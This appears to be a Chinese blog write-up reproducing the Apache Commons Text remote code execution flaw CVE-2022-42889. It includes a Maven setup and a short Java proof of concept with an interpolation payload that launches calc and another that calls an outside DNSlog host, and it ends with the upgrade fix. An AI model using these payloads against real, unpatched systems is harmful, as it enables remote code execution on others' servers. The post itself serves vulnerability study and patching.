CVE-2022-42889 Apache Commons Text远程代码执行漏洞复现
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Apache Commons是Apache软件基金会的项目。Commons的目的是提供可重用的、开源的Java代码。Apache Commons提供了很多工具类库,几乎不依赖其他第三方的类库,接口稳定,集成简单,可以大大提高编码效率和代码质量。
0x03 漏洞概述:
Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。
0x04 影响版本:
1.5 <= Apache Commons Text 版本<= 1.9
0x05 环境搭建:
通过Maven导入jar包。
<dependencies> <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-configuration2</artifactId> <version>2.7</version> </dependency> <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-text</artifactId> <version>1.9</version> </dependency> <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-lang3</artifactId> <version>3.12.0</version> </dependency> </dependencies>
0x06 漏洞复现:
代码:
package org.example; import org.apache.commons.text.StringSubstitutor; public class Main { public static void main(String[] args) { StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); // String payload = interpolator.replace("${script:js:new java.lang.ProcessBuilder("calc").start()}"); String payload = interpolator.replace("${url:utf-8:http://owncjx.dnslog.cn}"); interpolator.replace(payload); } }
命令执行:
DNSlog外带查询:
0x07 修复建议:
目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。
下载链接:
0x08 参考文档:
https://www.cnblogs.com/wh4am1/p/16795499.html
上一篇:
Java架构师技术进阶路线图
下一篇:
计算机网络基本设备及网络拓扑图